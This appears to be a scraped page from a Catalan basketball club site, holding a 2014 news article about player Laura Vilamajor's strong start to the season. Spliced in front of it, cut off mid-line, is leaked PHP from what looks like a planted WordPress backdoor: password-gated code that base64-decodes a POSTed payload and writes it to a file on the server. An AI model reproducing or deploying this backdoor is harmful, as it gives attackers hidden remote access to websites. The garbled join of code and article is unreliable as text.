function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Laura Vilamajor, plena de confiança, agafa la batuta - Tgn Bàsquet Club -

Laura Vilamajor, plena de confiança, agafa la batuta

By
Updated: octubre 8, 2014

Laura Vilamajor ha començat la temporada amb força. L’exterior del Nemser TGN Bàsquet està acreditant unes bones estadístiques en els dos primers partits del curs i això ha servit, almenys, perquè el seu equip hagi sumat un triomf dels dos possibles. En aquell matx, el que obria l’actual campanya, el Nemser TGN Bàsquet es va imposar al Grup Barna per un sol punt (60-59) i el paper de Vilamajor va ser crucial. Ella va ser la màxima encistelladora del seu equip, amb 12 punts, i amb 2 triples inclosos. “Jordi [Hernández] sempre ens diu que hem de tirar més. Aquell dia ho vaig fer i, tot i que a l’inici els tirs no entraven, al final sí. Crec, però, que totes podem aportar moltes coses i això és bàsic”, diu Vilamajor que admet que l’equip es troba “físicament molt bé”.

En el segon matx de la temporada, el primer fora del pavelló del Sagrat Cor, el Nemser va caure contra el Samà Vilanova, en un partit en què va anar de més a menys (65-56) i en què Vilamajor va anotar 8 punts. “La derrota va ser una qüestió del propi partit més que pel fet de no estar preparades. Aquesta temporada, si mirem allò que va passar en les dues últimes, també serà molt igualada i, al final, de vegades no depens exclusivament del que fas, sinó que, en finals ajustats, un tir fallat o una passada perduda poden decidir un partit”, assegura. Vilamajor afirma que té molta confiança dins la pista i és gràcies a la relació que té amb les seves companyes: “Som gairebé el mateix bloc que l’any passat i, la veritat, em sento molt còmoda amb les companyes i això sempre ajuda a jugar amb més determinació”. L’aler del Nemser TGN Bàsquet matisa que s’ha d’anar “partit a partit, sense mirar més enllà” per tal de fer una bona temporada.

 

 

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *